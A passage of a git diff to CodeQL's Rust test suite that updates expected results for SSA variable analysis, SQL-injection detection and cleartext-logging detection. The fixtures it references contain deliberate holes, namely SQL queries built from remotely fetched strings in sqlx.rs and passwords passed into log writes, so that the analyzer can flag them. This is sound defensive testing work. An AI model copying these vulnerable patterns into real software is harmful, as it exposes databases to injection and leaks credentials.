| closure2 | main.rs:453:5:453:12 | closure2 | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | main.rs:454:15:454:15 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | main.rs:462:15:462:15 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | main.rs:461:5:461:12 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | main.rs:459:9:459:9 | z | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | main.rs:471:5:471:9 | block | | main.rs:471:5:471:15 | i | main.rs:466:13:466:13 | i | main.rs:472:15:472:15 | i | | main.rs:475:8:475:8 | b | main.rs:475:8:475:8 | b | main.rs:479:8:479:8 | b | @@ -414,11 +456,16 @@ firstRead | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:525:9:525:9 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | main.rs:523:13:523:16 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | main.rs:523:25:523:25 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | main.rs:532:15:532:15 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | main.rs:536:15:536:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | | main.rs:544:5:544:5 | a | main.rs:540:13:540:13 | a | main.rs:545:15:545:15 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:550:20:550:20 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | main.rs:554:20:554:20 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | main.rs:563:6:563:9 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | main.rs:569:3:569:3 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | main.rs:571:13:571:13 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | main.rs:595:15:595:28 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | main.rs:601:15:601:26 | var_in_macro | @@ -437,12 +484,14 @@ adjacentReads | main.rs:290:9:290:11 | a10 | main.rs:279:13:279:15 | a10 | main.rs:292:9:292:11 | a10 | main.rs:296:15:296:17 | a10 | | main.rs:290:9:290:11 | a10 | main.rs:279:13:279:15 | a10 | main.rs:296:15:296:17 | a10 | main.rs:310:15:310:17 | a10 | | main.rs:333:9:333:9 | f | main.rs:333:9:333:9 | f | main.rs:336:15:336:15 | f | main.rs:342:15:342:15 | f | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | main.rs:374:11:374:11 | a | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | main.rs:388:10:388:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:388:10:388:10 | x | main.rs:389:10:389:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:389:10:389:10 | x | main.rs:390:12:390:12 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:394:6:394:6 | x | main.rs:395:10:395:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:395:10:395:10 | x | main.rs:396:10:396:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:396:10:396:10 | x | main.rs:398:9:398:9 | x | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | main.rs:411:19:411:19 | x | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | main.rs:416:7:416:7 | w | | main.rs:476:13:476:13 | x | main.rs:476:13:476:13 | x | main.rs:477:15:477:15 | x | main.rs:478:15:478:15 | x | | main.rs:480:9:480:9 | x | main.rs:476:13:476:13 | x | main.rs:481:19:481:19 | x | main.rs:482:19:482:19 | x | @@ -452,6 +501,7 @@ adjacentReads | main.rs:492:9:492:9 | x | main.rs:492:9:492:9 | x | main.rs:496:19:496:19 | x | main.rs:500:19:500:19 | x | | main.rs:492:9:492:9 | x | main.rs:492:9:492:9 | x | main.rs:496:19:496:19 | x | main.rs:502:19:502:19 | x | | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:525:9:525:9 | f | main.rs:526:9:526:9 | f | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | main.rs:534:15:534:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | main.rs:542:5:542:5 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:542:5:542:5 | a | main.rs:543:15:543:15 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:550:20:550:20 | x | main.rs:551:15:551:15 | x | @@ -553,9 +603,14 @@ assigns | main.rs:333:9:333:9 | f | main.rs:334:9:335:9 | \|...\| x | | main.rs:354:13:354:13 | f | main.rs:355:13:356:13 | \|...\| x | | main.rs:362:9:362:9 | v | main.rs:362:13:362:41 | &... | +| main.rs:371:13:371:13 | a | main.rs:371:17:371:17 | 0 | +| main.rs:379:13:379:13 | i | main.rs:379:17:379:17 | 1 | | main.rs:380:9:380:13 | ref_i | main.rs:381:9:381:14 | &mut i | +| main.rs:402:13:402:13 | x | main.rs:402:17:402:17 | 2 | | main.rs:403:9:403:9 | y | main.rs:404:9:404:28 | mutate_param(...) | +| main.rs:409:13:409:13 | z | main.rs:409:17:409:17 | 4 | | main.rs:410:9:410:9 | w | main.rs:411:9:411:19 | &mut ... | +| main.rs:422:13:422:13 | x | main.rs:422:17:422:17 | 1 | | main.rs:423:9:423:9 | y | main.rs:424:9:424:14 | &mut x | | main.rs:430:9:430:9 | x | main.rs:430:13:430:15 | 100 | | main.rs:432:9:432:11 | cap | main.rs:432:15:434:5 | \|...\| ... | @@ -564,6 +619,7 @@ assigns | main.rs:448:13:448:13 | y | main.rs:448:17:448:17 | 2 | | main.rs:450:13:450:20 | closure2 | main.rs:450:24:452:5 | \|...\| ... | | main.rs:451:9:451:9 | y | main.rs:451:13:451:13 | 3 | +| main.rs:456:13:456:13 | z | main.rs:456:17:456:17 | 2 | | main.rs:458:13:458:20 | closure3 | main.rs:458:24:460:5 | \|...\| ... | | main.rs:466:13:466:13 | i | main.rs:466:22:466:22 | 0 | | main.rs:467:9:467:13 | block | main.rs:467:17:469:5 | { ... } | @@ -573,10 +629,13 @@ assigns | main.rs:484:9:484:9 | x | main.rs:484:13:484:13 | 3 | | main.rs:492:9:492:9 | x | main.rs:492:13:492:13 | 1 | | main.rs:521:17:521:17 | f | main.rs:521:21:524:9 | \|...\| ... | +| main.rs:531:13:531:13 | a | main.rs:531:17:531:35 | MyStruct {...} | +| main.rs:535:5:535:5 | a | main.rs:535:9:535:27 | MyStruct {...} | | main.rs:540:13:540:13 | a | main.rs:540:17:540:25 | [...] | | main.rs:544:5:544:5 | a | main.rs:544:9:544:17 | [...] | | main.rs:549:9:549:9 | x | main.rs:549:13:549:14 | 16 | | main.rs:553:9:553:9 | z | main.rs:553:13:553:14 | 17 | +| main.rs:568:11:568:11 | a | main.rs:568:15:568:33 | MyStruct {...} | | main.rs:593:9:593:22 | var_from_macro | main.rs:594:9:594:25 | MacroExpr | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:23:594:24 | 37 | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:24:596:25 | 33 | diff --git a/rust/ql/test/library-tests/variables/Ssa.ql b/rust/ql/test/library-tests/variables/Ssa.ql index a6005c62b008..3c72849f77ac 100644 --- a/rust/ql/test/library-tests/variables/Ssa.ql +++ b/rust/ql/test/library-tests/variables/Ssa.ql @@ -5,8 +5,6 @@ import codeql.rust.dataflow.Ssa import codeql.rust.dataflow.internal.SsaImpl import ExposedForTestingOnly -query predicate nonSsaVariable(Variable v) { not v instanceof Ssa::Variable } - query predicate definition(Ssa::Definition def, Variable v) { def.getSourceVariable() = v } query predicate read(Ssa::Definition def, Variable v, CfgNode read) { diff --git a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected index 2462328c24cc..6b04453ec9ae 100644 --- a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected +++ b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.expected @@ -1,10 +1,13 @@ #select | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | +| sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | +| sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | This query depends on a $@. | sqlx.rs:48:25:48:46 | ...::get | user-provided value | edges -| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:49:25:49:37 | remote_string | provenance | | +| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | provenance | MaD:6 | +| sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:54:27:54:39 | remote_string | provenance | | | sqlx.rs:48:9:48:21 | remote_string | sqlx.rs:56:34:56:89 | MacroExpr | provenance | | | sqlx.rs:48:25:48:46 | ...::get | sqlx.rs:48:25:48:69 | ...::get(...) [Ok] | provenance | Src:MaD:1 | | sqlx.rs:48:25:48:69 | ...::get(...) [Ok] | sqlx.rs:48:25:48:78 | ... .unwrap(...) | provenance | MaD:4 | @@ -12,27 +15,28 @@ edges | sqlx.rs:48:25:48:85 | ... .text(...) [Ok] | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | provenance | MaD:5 | | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | sqlx.rs:48:9:48:21 | remote_string | provenance | | | sqlx.rs:49:9:49:21 | remote_number | sqlx.rs:52:32:52:87 | MacroExpr | provenance | | -| sqlx.rs:49:25:49:37 | remote_string | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | provenance | MaD:6 | | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | provenance | MaD:5 | | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | sqlx.rs:49:9:49:21 | remote_number | provenance | | -| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:62:26:62:37 | safe_query_3 | provenance | | -| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:73:25:73:36 | safe_query_3 | provenance | | +| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | provenance | MaD:2 | +| sqlx.rs:52:9:52:20 | safe_query_3 | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | provenance | MaD:2 | | sqlx.rs:52:24:52:88 | res | sqlx.rs:52:32:52:87 | { ... } | provenance | | | sqlx.rs:52:32:52:87 | ...::format(...) | sqlx.rs:52:24:52:88 | res | provenance | | | sqlx.rs:52:32:52:87 | ...::must_use(...) | sqlx.rs:52:9:52:20 | safe_query_3 | provenance | | | sqlx.rs:52:32:52:87 | MacroExpr | sqlx.rs:52:32:52:87 | ...::format(...) | provenance | MaD:3 | | sqlx.rs:52:32:52:87 | { ... } | sqlx.rs:52:32:52:87 | ...::must_use(...) | provenance | MaD:7 | -| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:67:30:67:43 | unsafe_query_4 | provenance | | -| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:78:29:78:42 | unsafe_query_4 | provenance | | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:26:54:39 | &remote_string [&ref] | sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | provenance | | +| sqlx.rs:54:27:54:39 | remote_string | sqlx.rs:54:26:54:39 | &remote_string [&ref] | provenance | | +| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | provenance | MaD:2 | +| sqlx.rs:56:9:56:22 | unsafe_query_4 | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | provenance | MaD:2 | | sqlx.rs:56:26:56:90 | res | sqlx.rs:56:34:56:89 | { ... } | provenance | | | sqlx.rs:56:34:56:89 | ...::format(...) | sqlx.rs:56:26:56:90 | res | provenance | | | sqlx.rs:56:34:56:89 | ...::must_use(...) | sqlx.rs:56:9:56:22 | unsafe_query_4 | provenance | | | sqlx.rs:56:34:56:89 | MacroExpr | sqlx.rs:56:34:56:89 | ...::format(...) | provenance | MaD:3 | | sqlx.rs:56:34:56:89 | { ... } | sqlx.rs:56:34:56:89 | ...::must_use(...) | provenance | MaD:7 | -| sqlx.rs:62:26:62:37 | safe_query_3 | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | provenance | MaD:2 | -| sqlx.rs:67:30:67:43 | unsafe_query_4 | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | provenance | MaD:2 | -| sqlx.rs:73:25:73:36 | safe_query_3 | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | provenance | MaD:2 | -| sqlx.rs:78:29:78:42 | unsafe_query_4 | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | provenance | MaD:2 | +| sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | provenance | MaD:2 | +| sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | provenance | MaD:2 | models | 1 | Source: repo:https://github.com/seanmonstar/reqwest:reqwest; crate::blocking::get; remote; ReturnValue.Field[crate::result::Result::Ok(0)] | | 2 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | @@ -50,7 +54,6 @@ nodes | sqlx.rs:48:25:48:85 | ... .text(...) [Ok] | semmle.label | ... .text(...) [Ok] | | sqlx.rs:48:25:48:118 | ... .unwrap_or(...) | semmle.label | ... .unwrap_or(...) | | sqlx.rs:49:9:49:21 | remote_number | semmle.label | remote_number | -| sqlx.rs:49:25:49:37 | remote_string | semmle.label | remote_string | | sqlx.rs:49:25:49:52 | remote_string.parse(...) [Ok] | semmle.label | remote_string.parse(...) [Ok] | | sqlx.rs:49:25:49:65 | ... .unwrap_or(...) | semmle.label | ... .unwrap_or(...) | | sqlx.rs:52:9:52:20 | safe_query_3 | semmle.label | safe_query_3 | @@ -59,18 +62,21 @@ nodes | sqlx.rs:52:32:52:87 | ...::must_use(...) | semmle.label | ...::must_use(...) | | sqlx.rs:52:32:52:87 | MacroExpr | semmle.label | MacroExpr | | sqlx.rs:52:32:52:87 | { ... } | semmle.label | { ... } | +| sqlx.rs:54:9:54:22 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:54:26:54:39 | &remote_string [&ref] | semmle.label | &remote_string [&ref] | +| sqlx.rs:54:27:54:39 | remote_string | semmle.label | remote_string | | sqlx.rs:56:9:56:22 | unsafe_query_4 | semmle.label | unsafe_query_4 | | sqlx.rs:56:26:56:90 | res | semmle.label | res | | sqlx.rs:56:34:56:89 | ...::format(...) | semmle.label | ...::format(...) | | sqlx.rs:56:34:56:89 | ...::must_use(...) | semmle.label | ...::must_use(...) | | sqlx.rs:56:34:56:89 | MacroExpr | semmle.label | MacroExpr | | sqlx.rs:56:34:56:89 | { ... } | semmle.label | { ... } | -| sqlx.rs:62:26:62:37 | safe_query_3 | semmle.label | safe_query_3 | | sqlx.rs:62:26:62:46 | safe_query_3.as_str(...) | semmle.label | safe_query_3.as_str(...) | -| sqlx.rs:67:30:67:43 | unsafe_query_4 | semmle.label | unsafe_query_4 | +| sqlx.rs:65:30:65:43 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:65:30:65:52 | unsafe_query_2.as_str(...) | semmle.label | unsafe_query_2.as_str(...) | | sqlx.rs:67:30:67:52 | unsafe_query_4.as_str(...) | semmle.label | unsafe_query_4.as_str(...) | -| sqlx.rs:73:25:73:36 | safe_query_3 | semmle.label | safe_query_3 | | sqlx.rs:73:25:73:45 | safe_query_3.as_str(...) | semmle.label | safe_query_3.as_str(...) | -| sqlx.rs:78:29:78:42 | unsafe_query_4 | semmle.label | unsafe_query_4 | +| sqlx.rs:76:29:76:42 | unsafe_query_2 [&ref] | semmle.label | unsafe_query_2 [&ref] | +| sqlx.rs:76:29:76:51 | unsafe_query_2.as_str(...) | semmle.label | unsafe_query_2.as_str(...) | | sqlx.rs:78:29:78:51 | unsafe_query_4.as_str(...) | semmle.label | unsafe_query_4.as_str(...) | subpaths diff --git a/rust/ql/test/query-tests/security/CWE-089/sqlx.rs b/rust/ql/test/query-tests/security/CWE-089/sqlx.rs index f819ea3a781e..d40a4bb2a118 100644 --- a/rust/ql/test/query-tests/security/CWE-089/sqlx.rs +++ b/rust/ql/test/query-tests/security/CWE-089/sqlx.rs @@ -62,7 +62,7 @@ async fn test_sqlx_mysql(url: &str, enable_remote: bool) -> Result<(), sqlx::Err let _ = conn.execute(safe_query_3.as_str()).await?; // $ sql-sink SPURIOUS: Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_1.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=args1 if enable_remote { - let _ = conn.execute(unsafe_query_2.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 + let _ = conn.execute(unsafe_query_2.as_str()).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_3.as_str()).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 let _ = conn.execute(unsafe_query_4.as_str()).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 } @@ -73,7 +73,7 @@ async fn test_sqlx_mysql(url: &str, enable_remote: bool) -> Result<(), sqlx::Err let _ = sqlx::query(safe_query_3.as_str()).execute(&pool).await?; // $ sql-sink SPURIOUS: Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_1.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection][rust/sql-injection]=args1 if enable_remote { - let _ = sqlx::query(unsafe_query_2.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 + let _ = sqlx::query(unsafe_query_2.as_str()).execute(&pool).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_3.as_str()).execute(&pool).await?; // $ sql-sink MISSING: Alert[rust/sql-injection]=remote1 let _ = sqlx::query(unsafe_query_4.as_str()).execute(&pool).await?; // $ sql-sink Alert[rust/sql-injection]=remote1 } diff --git a/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected b/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected index a34f9d78f520..3f417d62ebc1 100644 --- a/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected +++ b/rust/ql/test/query-tests/security/CWE-312/CleartextLogging.expected @@ -180,43 +180,38 @@ edges | test_logging.rs:167:40:167:63 | ...::Some(...) [Some] | test_logging.rs:167:17:167:64 | ...::assert_failed | provenance | MaD:2 Sink:MaD:2 | | test_logging.rs:167:40:167:63 | MacroExpr | test_logging.rs:167:40:167:63 | ...::Some(...) [Some] | provenance | | | test_logging.rs:167:56:167:63 | password | test_logging.rs:167:40:167:63 | MacroExpr | provenance | | -| test_logging.rs:168:34:168:66 | MacroExpr | test_logging.rs:168:34:168:75 | ... .as_str(...) | provenance | MaD:12 | | test_logging.rs:168:34:168:66 | res | test_logging.rs:168:42:168:65 | { ... } | provenance | | | test_logging.rs:168:34:168:75 | ... .as_str(...) | test_logging.rs:168:27:168:32 | expect | provenance | MaD:1 Sink:MaD:1 | | test_logging.rs:168:42:168:65 | ...::format(...) | test_logging.rs:168:34:168:66 | res | provenance | | -| test_logging.rs:168:42:168:65 | ...::must_use(...) | test_logging.rs:168:34:168:66 | MacroExpr | provenance | | +| test_logging.rs:168:42:168:65 | ...::must_use(...) | test_logging.rs:168:34:168:75 | ... .as_str(...) | provenance | MaD:12 | | test_logging.rs:168:42:168:65 | MacroExpr | test_logging.rs:168:42:168:65 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:168:42:168:65 | { ... } | test_logging.rs:168:42:168:65 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:168:58:168:65 | password | test_logging.rs:168:42:168:65 | MacroExpr | provenance | | -| test_logging.rs:174:36:174:70 | MacroExpr | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:174:36:174:70 | res | test_logging.rs:174:44:174:69 | { ... } | provenance | | | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | test_logging.rs:174:30:174:34 | write | provenance | MaD:5 Sink:MaD:5 | | test_logging.rs:174:44:174:69 | ...::format(...) | test_logging.rs:174:36:174:70 | res | provenance | | -| test_logging.rs:174:44:174:69 | ...::must_use(...) | test_logging.rs:174:36:174:70 | MacroExpr | provenance | | +| test_logging.rs:174:44:174:69 | ...::must_use(...) | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:174:44:174:69 | MacroExpr | test_logging.rs:174:44:174:69 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:174:44:174:69 | { ... } | test_logging.rs:174:44:174:69 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:174:62:174:69 | password | test_logging.rs:174:44:174:69 | MacroExpr | provenance | | -| test_logging.rs:175:40:175:74 | MacroExpr | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:175:40:175:74 | res | test_logging.rs:175:48:175:73 | { ... } | provenance | | | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | test_logging.rs:175:30:175:38 | write_all | provenance | MaD:6 Sink:MaD:6 | | test_logging.rs:175:48:175:73 | ...::format(...) | test_logging.rs:175:40:175:74 | res | provenance | | -| test_logging.rs:175:48:175:73 | ...::must_use(...) | test_logging.rs:175:40:175:74 | MacroExpr | provenance | | +| test_logging.rs:175:48:175:73 | ...::must_use(...) | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:175:48:175:73 | MacroExpr | test_logging.rs:175:48:175:73 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:175:48:175:73 | { ... } | test_logging.rs:175:48:175:73 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:175:66:175:73 | password | test_logging.rs:175:48:175:73 | MacroExpr | provenance | | -| test_logging.rs:178:15:178:49 | MacroExpr | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:178:15:178:49 | res | test_logging.rs:178:23:178:48 | { ... } | provenance | | | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | test_logging.rs:178:9:178:13 | write | provenance | MaD:5 Sink:MaD:5 | | test_logging.rs:178:23:178:48 | ...::format(...) | test_logging.rs:178:15:178:49 | res | provenance | | -| test_logging.rs:178:23:178:48 | ...::must_use(...) | test_logging.rs:178:15:178:49 | MacroExpr | provenance | | +| test_logging.rs:178:23:178:48 | ...::must_use(...) | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:178:23:178:48 | MacroExpr | test_logging.rs:178:23:178:48 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:178:23:178:48 | { ... } | test_logging.rs:178:23:178:48 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:178:41:178:48 | password | test_logging.rs:178:23:178:48 | MacroExpr | provenance | | -| test_logging.rs:181:15:181:49 | MacroExpr | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:181:15:181:49 | res | test_logging.rs:181:23:181:48 | { ... } | provenance | | | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | test_logging.rs:181:9:181:13 | write | provenance | MaD:4 Sink:MaD:4 | | test_logging.rs:181:23:181:48 | ...::format(...) | test_logging.rs:181:15:181:49 | res | provenance | | -| test_logging.rs:181:23:181:48 | ...::must_use(...) | test_logging.rs:181:15:181:49 | MacroExpr | provenance | | +| test_logging.rs:181:23:181:48 | ...::must_use(...) | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | provenance | MaD:11 | | test_logging.rs:181:23:181:48 | MacroExpr | test_logging.rs:181:23:181:48 | ...::format(...) | provenance | MaD:13 | | test_logging.rs:181:23:181:48 | { ... } | test_logging.rs:181:23:181:48 | ...::must_use(...) | provenance | MaD:14 | | test_logging.rs:181:41:181:48 | password | test_logging.rs:181:23:181:48 | MacroExpr | provenance | | @@ -404,7 +399,6 @@ nodes | test_logging.rs:167:40:167:63 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:167:56:167:63 | password | semmle.label | password | | test_logging.rs:168:27:168:32 | expect | semmle.label | expect | -| test_logging.rs:168:34:168:66 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:168:34:168:66 | res | semmle.label | res | | test_logging.rs:168:34:168:75 | ... .as_str(...) | semmle.label | ... .as_str(...) | | test_logging.rs:168:42:168:65 | ...::format(...) | semmle.label | ...::format(...) | @@ -413,7 +407,6 @@ nodes | test_logging.rs:168:42:168:65 | { ... } | semmle.label | { ... } | | test_logging.rs:168:58:168:65 | password | semmle.label | password | | test_logging.rs:174:30:174:34 | write | semmle.label | write | -| test_logging.rs:174:36:174:70 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:174:36:174:70 | res | semmle.label | res | | test_logging.rs:174:36:174:81 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:174:44:174:69 | ...::format(...) | semmle.label | ...::format(...) | @@ -422,7 +415,6 @@ nodes | test_logging.rs:174:44:174:69 | { ... } | semmle.label | { ... } | | test_logging.rs:174:62:174:69 | password | semmle.label | password | | test_logging.rs:175:30:175:38 | write_all | semmle.label | write_all | -| test_logging.rs:175:40:175:74 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:175:40:175:74 | res | semmle.label | res | | test_logging.rs:175:40:175:85 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:175:48:175:73 | ...::format(...) | semmle.label | ...::format(...) | @@ -431,7 +423,6 @@ nodes | test_logging.rs:175:48:175:73 | { ... } | semmle.label | { ... } | | test_logging.rs:175:66:175:73 | password | semmle.label | password | | test_logging.rs:178:9:178:13 | write | semmle.label | write | -| test_logging.rs:178:15:178:49 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:178:15:178:49 | res | semmle.label | res | | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:178:23:178:48 | ...::format(...) | semmle.label | ...::format(...) | @@ -440,7 +431,6 @@ nodes | test_logging.rs:178:23:178:48 | { ... } | semmle.label | { ... } | | test_logging.rs:178:41:178:48 | password | semmle.label | password | | test_logging.rs:181:9:181:13 | write | semmle.label | write | -| test_logging.rs:181:15:181:49 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:181:15:181:49 | res | semmle.label | res | | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:181:23:181:48 | ...::format(...) | semmle.label | ...::format(...) | diff --git a/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected b/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected index cb6fc390349c..55c2c12df107 100644 --- a/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected +++ b/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected @@ -1,2 +1,11 @@ unexpectedModel +| Unexpected summary found: repo::test;::clone;Argument[self].Field[crate::option::MyOption::MySome(0)].Reference;ReturnValue.Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: 